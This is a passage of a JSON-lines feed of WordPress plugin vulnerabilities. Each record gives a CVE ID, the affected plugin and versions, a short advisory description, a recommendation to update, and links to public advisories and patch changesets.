Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-meta-data-manager\\\/trunk\\\/includes\\\/admin\\\/html\\\/pmdm_wp_display_post_metadata_html.php#L23\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-meta-data-manager\\\/trunk\\\/includes\\\/admin\\\/html\\\/pmdm_wp_display_post_metadata_html.php#L23\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-meta-data-manager\\\/trunk\\\/includes\\\/admin\\\/html\\\/pmdm_wp_display_term_metadata_html.php#L32\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-meta-data-manager\\\/trunk\\\/includes\\\/admin\\\/html\\\/pmdm_wp_display_term_metadata_html.php#L32\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-meta-data-manager\\\/trunk\\\/includes\\\/admin\\\/html\\\/pmdm_wp_display_user_metadata_html.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/post-meta-data-manager\\\/trunk\\\/includes\\\/admin\\\/html\\\/pmdm_wp_display_user_metadata_html.php#L31\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109558\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3109558\\\/\",\"refsource\":\"\",\"tags\":[\"Patch\"]}]"}
{"CVE_ID":"CVE-2023-6996","slug":"shortcode-to-display-post-and-user-data","versionImpact":"1.2.1","versionEndExcluding":"1.3.0","description":"The Display custom fields in the frontend \u2013 Post and User Profile Fields plugin for WordPress is vulnerable to Code Injection via the plugin's vg_display_data shortcode in all versions up to, and including, 1.2.1 due to insufficient input validation and restriction on access to that shortcode. This makes it possible for authenticated attackers with contributor-level and above permissions to call arbitrary functions and execute code.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0662c3a-5b82-4b9a-aa69-147094930d1f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e0662c3a-5b82-4b9a-aa69-147094930d1f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2131","slug":"move-addons","versionImpact":"1.2.9","versionEndExcluding":"1.3.0","description":"The Move Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's infobox and button widget in all versions up to, and including, 1.2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7b6af5a-ad44-4dd6-9ce1-6fcbd28f8ebe?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e7b6af5a-ad44-4dd6-9ce1-6fcbd28f8ebe?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3048903%40move-addons&new=3048903%40move-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3048903%40move-addons&new=3048903%40move-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-47835","slug":"ari-stream-quiz","versionImpact":"1.2.32","versionEndExcluding":"1.3.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ARI Soft ARI Stream Quiz \u2013 WordPress Quizzes Builder plugin <=\u00a01.2.32 versions.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ari-stream-quiz\\\/wordpress-ari-stream-quiz-plugin-1-2-32-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/ari-stream-quiz\\\/wordpress-ari-stream-quiz-plugin-1-2-32-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6983","slug":"shortcode-to-display-post-and-user-data","versionImpact":"1.2.1","versionEndExcluding":"1.3.0","description":"The Display custom fields in the frontend \u2013 Post and User Profile Fields plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.2.1 via the vg_display_data shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with contributor-level access and above, to retrieve potentially sensitive post meta.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08d43c67-df40-4f1a-a351-803e59edee13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/08d43c67-df40-4f1a-a351-803e59edee13?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6982","slug":"shortcode-to-display-post-and-user-data","versionImpact":"1.2.1","versionEndExcluding":"1.3.0","description":"The Display custom fields in the frontend \u2013 Post and User Profile Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode and postmeta in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3077b84e-87af-4307-83c5-0e4b15d07ff1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3077b84e-87af-4307-83c5-0e4b15d07ff1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3021133%40shortcode-to-display-post-and-user-data&new=3021133%40shortcode-to-display-post-and-user-data&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9824","slug":"image-gallery","versionImpact":"1.2.2","versionEndExcluding":"1.3.0","description":"The ImagePress \u2013 Image Gallery plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the 'ip_delete_post' and 'ip_update_post_title' functions in all versions up to, and including, 1.2.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts and update post titles.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bce6872-34d4-4675-bce9-e1197d801bce?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3bce6872-34d4-4675-bce9-e1197d801bce?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/functions.php#L204\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/functions.php#L204\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/functions.php#L214\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/functions.php#L214\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167164\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167164\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9778","slug":"image-gallery","versionImpact":"1.2.2","versionEndExcluding":"1.3.0","description":"The ImagePress \u2013 Image Gallery plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.2. This is due to missing or incorrect nonce validation on the 'imagepress_admin_page' function. This makes it possible for unauthenticated attackers to update plugin settings, including redirection URLs, via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/200b3446-6107-434b-b46d-2078461f3f94?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/200b3446-6107-434b-b46d-2078461f3f94?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L106\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L106\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L267\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L380\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L380\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L461\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L461\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L2\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php#L2\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167164\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167164\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9776","slug":"image-gallery","versionImpact":"1.2.2","versionEndExcluding":"1.3.0","description":"The ImagePress \u2013 Image Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.3.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/655c08e6-4ef2-438e-b381-1bc3748c3771?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/655c08e6-4ef2-438e-b381-1bc3748c3771?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/image-gallery\\\/trunk\\\/includes\\\/page-settings.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167164\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3167164\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5883","slug":"ultimate-classified-listings","versionImpact":"1.2","versionEndExcluding":"1.3","description":"The Ultimate Classified Listings WordPress plugin before 1.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"Update to version 1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a1894884-c739-4ef4-8d9c-392171ab3d68\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a1894884-c739-4ef4-8d9c-392171ab3d68\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2846","slug":"visual-footer-credit-remover","versionImpact":"1.2","versionEndExcluding":"1.3","description":"The Visual Footer Credit Remover plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'selector' parameter in all versions up to, and including, 2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","recommendation":"Update to version 1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081401%40visual-footer-credit-remover&new=3081401%40visual-footer-credit-remover&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3081401%40visual-footer-credit-remover&new=3081401%40visual-footer-credit-remover&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fcb65a0-4218-4728-9c29-0d1a03f438a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fcb65a0-4218-4728-9c29-0d1a03f438a6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11415","slug":"wp-orphanage-extended","versionImpact":"1.2","versionEndExcluding":"1.3","description":"The WP-Orphanage Extended plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on the wporphanageex_menu_settings() function. This makes it possible for unauthenticated attackers to escalate the privileges of all orphan accounts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-orphanage-extended\\\/trunk\\\/wp-orphanage-extended-options.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-orphanage-extended\\\/trunk\\\/wp-orphanage-extended-options.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194570%40wp-orphanage-extended&new=3194570%40wp-orphanage-extended&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3194570%40wp-orphanage-extended&new=3194570%40wp-orphanage-extended&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7ed6255-d8df-4f57-961b-1a0c21e352ac?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7ed6255-d8df-4f57-961b-1a0c21e352ac?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2015-10128","slug":"rt-prettyphoto","versionImpact":"1.2","versionEndExcluding":"1.3","description":"A vulnerability was found in rt-prettyphoto Plugin up to 1.2 on WordPress and classified as problematic. Affected by this issue is the function royal_prettyphoto_plugin_links of the file rt-prettyphoto.php. The manipulation leads to cross site scripting. The attack may be launched remotely. Upgrading to version 1.3 is able to address this issue. The patch is identified as 0d3d38cfa487481b66869e4212df1cefc281ecb7. It is recommended to upgrade the affected component. VDB-249422 is the identifier assigned to this vulnerability.","recommendation":"Update to version 1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/vuldb.com\\\/?id.249422\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?id.249422\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.249422\",\"name\":\"https:\\\/\\\/vuldb.com\\\/?ctiid.249422\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/rt-prettyphoto\\\/commit\\\/0d3d38cfa487481b66869e4212df1cefc281ecb7\",\"name\":\"https:\\\/\\\/github.com\\\/wp-plugins\\\/rt-prettyphoto\\\/commit\\\/0d3d38cfa487481b66869e4212df1cefc281ecb7\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7049","slug":"custom-field-for-wp-job-manager","versionImpact":"1.2","versionEndExcluding":"1.3","description":"The Custom Field For WP Job Manager plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.2 via the 'cm_fieldshow' shortcode due to missing validation on the 'job_id' user controlled key. This makes it possible for authenticated attackers, with contributor-level access and above, to expose potentially sensitive post metadata.","recommendation":"Update to version 1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9891587b-2a63-41be-b79d-afe407dd57fa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9891587b-2a63-41be-b79d-afe407dd57fa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134344\\\/custom-field-for-wp-job-manager\\\/trunk\\\/includes\\\/CFWJM_Shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3134344\\\/custom-field-for-wp-job-manager\\\/trunk\\\/includes\\\/CFWJM_Shortcode.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12522","slug":"yayforms","versionImpact":"1.2.1","versionEndExcluding":"1.3","description":"The Yay! Forms | Embed Custom Forms, Surveys, and Quizzes Easily plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'yayforms' shortcode in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yayforms\\\/tags\\\/1.2.1\\\/yayforms.php#L123\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yayforms\\\/tags\\\/1.2.1\\\/yayforms.php#L123\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/461ab75a-3ced-4296-9dc1-b8eee17a8299?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/461ab75a-3ced-4296-9dc1-b8eee17a8299?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9346","slug":"video-embed-privacy","versionImpact":"1.2","versionEndExcluding":"1.3","description":"The Embed videos and respect privacy plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'v' parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/487e5add-726c-4cfc-b86e-bb4eeec168a3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/487e5add-726c-4cfc-b86e-bb4eeec168a3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-embed-privacy\\\/trunk\\\/preview\\\/preview.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/video-embed-privacy\\\/trunk\\\/preview\\\/preview.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3162600%40video-embed-privacy&new=3162600%40video-embed-privacy&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3162600%40video-embed-privacy&new=3162600%40video-embed-privacy&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0893","slug":"time-sheets","versionEndExcluding":"1.29.3","description":"The Time Sheets WordPress plugin before 1.29.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd6ef6ee-15e9-44ac-a2db-976393a3b71a\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/fd6ef6ee-15e9-44ac-a2db-976393a3b71a\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7389","slug":"forminator","versionImpact":"1.29.1","versionEndExcluding":"1.29.2","description":"The Forminator plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.29.1 via class-forminator-addon-hubspot-wp-api.php. This makes it possible for unauthenticated attackers to extract the HubSpot integration developer API key and make unauthorized changes to the plugin's HubSpot integration or expose personally identifiable information from plugin users using the HubSpot integration.","recommendation":"Update to version 1.29.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d04b822-a48a-485e-b9b5-f5a213307c71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0d04b822-a48a-485e-b9b5-f5a213307c71?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/developers.hubspot.com\\\/docs\\\/api\\\/webhooks#scopes\",\"name\":\"https:\\\/\\\/developers.hubspot.com\\\/docs\\\/api\\\/webhooks#scopes\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/developers.hubspot.com\\\/docs\\\/api\\\/webhooks#manage-settings-via-api\",\"name\":\"https:\\\/\\\/developers.hubspot.com\\\/docs\\\/api\\\/webhooks#manage-settings-via-api\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047085\\\/forminator\\\/trunk\\\/addons\\\/pro\\\/hubspot\\\/lib\\\/class-forminator-addon-hubspot-wp-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047085\\\/forminator\\\/trunk\\\/addons\\\/pro\\\/hubspot\\\/lib\\\/class-forminator-addon-hubspot-wp-api.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6133","slug":"forminator","versionImpact":"1.27.0","versionEndExcluding":"1.28.0","description":"The Forminator plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient blacklisting on the 'forminator_allowed_mime_types' function in versions up to, and including, 1.27.0. This makes it possible for authenticated attackers with administrator-level capabilities or above to upload arbitrary files on the affected site's server, but due to the htaccess configuration, remote code cannot be executed.","recommendation":"Update to version 1.28.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13cfa202-ab90-46c0-ab53-00995bfdcaa3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/13cfa202-ab90-46c0-ab53-00995bfdcaa3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.27.0\\\/library\\\/fields\\\/upload.php#L356\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.27.0\\\/library\\\/fields\\\/upload.php#L356\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.27.0\\\/library\\\/fields\\\/upload.php#L372\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forminator\\\/tags\\\/1.27.0\\\/library\\\/fields\\\/upload.php#L372\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2995007\\\/forminator\\\/trunk\\\/library\\\/helpers\\\/helper-fields.php#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2995007\\\/forminator\\\/trunk\\\/library\\\/helpers\\\/helper-fields.php#file0\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1262","slug":"advanced-google-recaptcha","versionImpact":"1.27","versionEndExcluding":"1.28","description":"The Advanced Google reCaptcha plugin for WordPress is vulnerable to CAPTCHA Bypass in versions up to, and including, 1.27. This makes it possible for unauthenticated attackers to bypass the Built-in Math Captcha Verification.","recommendation":"Update to version 1.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244677\\\/advanced-google-recaptcha\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244677\\\/advanced-google-recaptcha\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d553aab2-d441-46d6-9c01-5dcfdc48674f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d553aab2-d441-46d6-9c01-5dcfdc48674f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-47647","slug":"helpie-faq","versionImpact":"1.27","versionEndExcluding":"1.28","description":"Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in HelpieWP Accordion & FAQ \u2013 Helpie WordPress Accordion FAQ Plugin allows Stored XSS. This issue affects Accordion & FAQ \u2013 Helpie WordPress Accordion FAQ Plugin: from n\/a through 1.27.","recommendation":"Update to version 1.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/helpie-faq\\\/wordpress-faq-accordion-docs-helpie-wordpress-faq-accordion-plugin-plugin-1-27-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/helpie-faq\\\/wordpress-faq-accordion-docs-helpie-wordpress-faq-accordion-plugin-plugin-1-27-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
